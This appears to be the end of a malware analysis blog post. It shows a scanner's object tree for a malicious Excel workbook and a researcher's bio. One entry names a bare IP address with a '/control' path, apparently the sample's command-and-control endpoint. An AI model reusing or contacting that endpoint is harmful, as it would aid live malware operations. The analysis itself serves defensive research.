                                                -ScanObject("ARCHIVE_FS" (5:"XML",6847,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_896_89432|theme/theme/theme1.xml")
                                                -ScanObject("ARCHIVE_FS" (5:"XML",283,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_896_89432|theme/theme/_rels/themeManager.xml.rels")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_89b_92617")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_88c_92637")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_809_92661")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",24,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_20b_92681")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",34,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_a1_92863")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",38,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_89c_92901")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_208_92999")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_208_93019")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_208_93039")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_208_93059")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_208_93079")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_208_93099")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_208_93119")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_208_93139")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_208_93159")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_208_93179")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_208_93199")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",31,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_6_93219")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",26,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_6_93254")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",31,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_6_93298")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",26,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_6_93333")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",33,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_6_93377")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",26,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_6_93414")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",46,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_6_93444")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",76,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_207_93494")
                                                                -ScanObject("URL_FS" (0:"UNKNOWN",0,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|195.123.209.169/control")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",26,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_d7_93602")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_208_93632")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_208_93652")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",16,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_208_93672")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",26,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_6_93720")
                                -ScanObject("MEM_FS" (0:"UNKNOWN",80,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/Workbook|Type_ec_93780")
                                ....
                -ScanObject("OLE2_FS" (0:"UNKNOWN",4096,"f286adbcb03c34cd05b466a18b7a0c087381d178|Root Entry/.DocumentSummaryInformation")

About the Author

KN

Kurt Natvig

Principal Research Scientist

Kurt Natvig is a Principal Research Scientist in Forcepoint's Innovation Lab. The Innovation Lab focuses on reducing the engineering-risk by researching and implementing proof-of-concepts beyond the roadmap.

Kurt is also heavily involved in reverse engineering malware and performs...